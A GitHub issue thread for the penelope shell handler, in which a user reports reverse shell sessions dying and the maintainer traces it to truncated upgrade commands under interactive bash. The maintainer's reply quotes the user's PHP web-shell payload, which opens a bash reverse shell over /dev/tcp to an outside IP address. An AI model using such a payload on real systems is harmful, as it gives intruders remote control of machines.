### ISSUE TITLE
Session [id] died...

### ISSUE THREAD

**Issue by furkan-enes-polatoglu** [brightio/penelope#15]
For a machine I have a reverse shell connection using nc, penelope is having a problem like the screenshot below. What is the reason for this? How can we solve it?

![111](https://github.com/brightio/penelope/assets/29992381/a6db0d6e-eebb-4974-9a97-0c0fe6e3977a)
![222](https://github.com/brightio/penelope/assets/29992381/6dcd4d12-711d-49dc-ac03-9c65eff17b14)

**Comment by brightio** [comment]
I spotted the bug. Interactive bash on this machine doesn't work as expected even when I set the TERM variable.

![image](https://github.com/brightio/penelope/assets/65655412/54d46c6e-4aee-44e9-9c06-504844ace1b2)

As you see in the picture, when your command is long it is truncated, so the upgrade command cannot run properly.

Have you had the same issue on other machines too?

This is your exploit payload:

`payload = '<?php passthru("bash -i >& /dev/tcp/192.168.45.162/13000 0>&1"); ?>'`

As a workaround remove the -i from the payload and it will work.

I am preparing a fix for that (silently converting the shell to non-interactive before upgrading). 

Many thanks for reporting this!
